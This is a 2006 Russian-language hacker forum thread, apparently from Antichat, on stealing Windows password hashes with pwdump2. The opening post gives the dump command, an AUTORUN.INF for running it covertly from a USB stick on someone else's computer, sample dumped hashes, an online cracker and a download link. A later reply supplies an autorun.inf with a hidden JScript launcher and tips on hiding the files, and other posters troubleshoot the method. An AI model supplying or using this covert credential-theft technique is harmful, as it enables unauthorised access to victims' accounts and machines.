Узнаём пароли Windows за 5 секунд

Discussion in 'Криптография, расшифровка хешей' started by Brun, 15 Aug 2006.

Thread Status:
Not open for further replies.
  1. Brun

    Brun Elder - Старейшина

    Joined:
    21 Mar 2006
    Messages:
    95
    Likes Received:
    57
    Reputations:
    16
    Кто то прошлой недели расказывал про RainbowCrack но как то скупо и мало. И я тоже про него ничего Вам не раскажу. Потому как таких програм уже развелось.
    Речь пойдёт о программе pwdump2.exe. Программка в использовании невероятно проста. Достаточно её запустить в командной строке например так :
    pwdump2.exe > pass.txt
    pass.txt анписал на случайно, потому как туда ушли хеши пользователей.

    На канале ачата некий BAY спрашивал зачем тырить пассы у друга (я до того описывал один способов применения, придумайте свой и напишите сдесь :D ). Ладно к другу идти не будем. Едём к недругу.
    Флешки стали в сей час очень популярны. Создаём на ней файл AUTORUN.INF (например) с таким содержимым :
    Code:
    [autorun]
    OPEN=pwdump2.exe > pass.txt
    ICON=pwdump2.exe
    Потом чёто там переписываем (новый альбом Бритни Спис илишто.) И без радости на лице (а то спалят) идём домой.
    Содержимое :
    Code:
    administrator:1003:5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914a77465923486e68:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:3d26128f74c4b110d9e1cf5872a4fd43:b5122fd690836f3950962915ecb287ce:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:cd01cba60848faf3204a0389d1ac9ef3:::
    VUSR_PZ1418:1004:c249e29af807bb32f6c000cbbff0ab93:19c11662fabc4372d38e06edab8c1ec5:::
    Наша жертва например administrator. Копируем хеш
    Code:
    5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914a77465923486e68
    и заходим на страничку : http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
    и там где пишет hash: вставляем наш хеш. Жмём Submit hash. Ждёмс около 5-10 секунд. И вот он пароль.
    Так же можно проверить свой пароль если ввести его в поле password:, нам выдаст хеш. Потом пробуем назад. Но єтот онлайн скрипт имеет не большую базу. А её то можно скачать по ссылкам :
    SSTIC04-10k (388MB), for PCs with at least 256MB of RAM
    SSTIC04-5k (720MB), for PCs with at least 512MB of RAM.
    Вообщем всё это читаете на том же сайте.

    Ах да. Где я взял pwdump2.exe? Если чесно то в гугле. Но если комуто тяжело искать то берите откуда брял я : http://www.doubleupsoftware.com/files/pwdump2.zip

    На этом и буду процатся.
    З.Ы. Это моя первая такого рода статья. Интересно Ваше мнение по поводу написания.
     
    18 people like this.
  2. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    На сколько мне известно, флеш не автозапускается из авторана, как сд. И говорили об этом уже не один раз.
    Единственно, что из авторана считывается иконка. А иконка, это картинка. А в картинках можно организовать переполнение буфера аля WMF. Или ещё одно переполнение в .bmp
    Кстати, нашли ещё одну дыру в WMF, правда там только дос. Проводник или любое другое кэширующе\воспроизводящая прога красиво падает в даун :)

    И вообще. pwdump разработали в 2000 году. А в каком году ХР вышло ? Не подскажите?
    Будем надеется, что у другана win2000 или NT.
     
  3. Brun

    Brun Elder - Старейшина

    Joined:
    21 Mar 2006
    Messages:
    95
    Likes Received:
    57
    Reputations:
    16
    по тексту читаем :
    pwdump2.exe
    Работает на ХР и 2003 серваке отлично. Проверенно. А вот чесно скажу на 2000 и НТ не проверял, поскоку небыло под руками.
     
  4. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    Ок! хрюша прошла тест :) Извиняюсь, просто как то не верилось, да и помнится мне старая версия дампа.
    Правда мой 10символьник сайт не разгодал :))
    Читанул сайтец. Интересная консольная альтернатива.

    2003 отказалась.

    Но с флешкой не прокатит просто так. это 100%
    Неоднократно проверял. С неё и загрузить операционку трудно... Вобщем много там заморочек.
    Но говорю, можно заюзать фичу с картинкой. Читаем статьи лебеда про метасплоит.
     
    #4 Elekt, 15 Aug 2006
    Last edited: 15 Aug 2006
    1 person likes this.
  5. Brun

    Brun Elder - Старейшина

    Joined:
    21 Mar 2006
    Messages:
    95
    Likes Received:
    57
    Reputations:
    16
    грузить операционку?... эт не то..
    Это автозагрузка (как с сидюка). А её мало кто выключает (но не я конечно). Так что вариант.
     
  6. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Юзал подобную фишку. В autorun.inf нужно написать
    Code:
    [autorun]
    ICON=icon.ico
    OPEN=wscript autorun.js
    ACTION=Take no action
    
    Выдрать у shell32'a иконку
    создать файл autorun.js
    Code:
    var WshShell = new ActiveXObject("WScript.Shell");
    var oExec = WshShell.Run('cmd /C "xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe>>pass.txt"',0);
    
    И всё работает наура, только после вставки флэшки, остаётся нажать Enter, на якомы "Ничего не делать" ;)
    Да, и ещё сделать их все скрытыми и системными :)
    Статья неплохая, держи +2
     
    2 people like this.
  7. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Предотвращение выполнения данных — Microsoft Windows
    LSA Shell (Export Version)
    Закрыть сообщение

    Хех... сработала защитп =)
    Windows XP MC 2005 рулид =)
    За статью + !
     
    1 person likes this.
  8. Dennie

    Dennie New Member

    Joined:
    10 Sep 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    А есть ли какая нибудь программа для расшифровки хешей? А то каждый раз на сайл бродить неудобно ;)
     
  9. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    А у меня вот что то тема с флэшкой не канает...
    вроде всё сделал как hidden написал но всё равно не выходит.
     
  10. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Так а что хоть не получилось? Когда на скрипт нажимаешь, пароль сохраняется?
     
  11. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Создаётся pass.txt но без хэшэй... пустой.
    Это если на autorun.js жать, а так флэшка сама не запускается.
     
  12. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe(G:\xxx\progs\PassRecovery\pwdump2\pwdump2.exe) - это относительный путь к этой програме на моей флешке, укажи куда ты её положил на своей флешке.
     
  13. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    я кинул сюда
    F:\xxx\progs\PassRecovery\pwdump2
    тоесть путь такой же как и у тебя...
    в прошлый раз пропустил xxx сейчас исправил, и при нажатии на autoran.js даже pass.txt не создаётся.
     
  14. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Тогда осталось только два варианта:
    1) У тебя стоит антивирус, фаервол или ещё какаянибудь ерунда, которая успешно блокирует эту прогу.
    2) У тебя что-то не так с виндой.

    Тем не мение, попробуй выполнить эту прогу через командную строку, если заработает, значит проблема в твоём интерпритаторе javascript'a иначе в проге.
     
  15. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
     
  16. fornax

    fornax Elder - Старейшина

    Joined:
    26 Apr 2006
    Messages:
    34
    Likes Received:
    4
    Reputations:
    11
    Со флешки НЕ ЗАПУСКАЕТСЯ!!! Сколько пробовал, всеравно!
     
  17. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    =)))))))) Держи крестик =)

    А вот мой способ качаем прогу Sam Imside... Устанаваливаем на флешку... Идем к "другу"... Туды Суды... Говоришь иму поставь чайник... Или "иди поставь, Чайник!"... Вообщем штоб он уш0л... Быстро заупускаем жмем адну кнопку, быстро запомниаем пароль и выдираем фляху... Но тут входит "друг", ловким движением пальца закидываем флеху под рукав и делаем вид, мол корпус расматриваешь, в дырке USB ковыряешься -))))

    =))))))))))))))))))))))))
    Тока вод нахира эти пароли нужны?
     
  18. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Винду переустанавливал пару дней назад =)
    Ни фаерволов ни антивирусников ещё не ставил.
    Через командную строку всё работает.
     
  19. Dennie

    Dennie New Member

    Joined:
    10 Sep 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
     
  20. Brun

    Brun Elder - Старейшина

    Joined:
    21 Mar 2006
    Messages:
    95
    Likes Received:
    57
    Reputations:
    16
     
Thread Status:
Not open for further replies.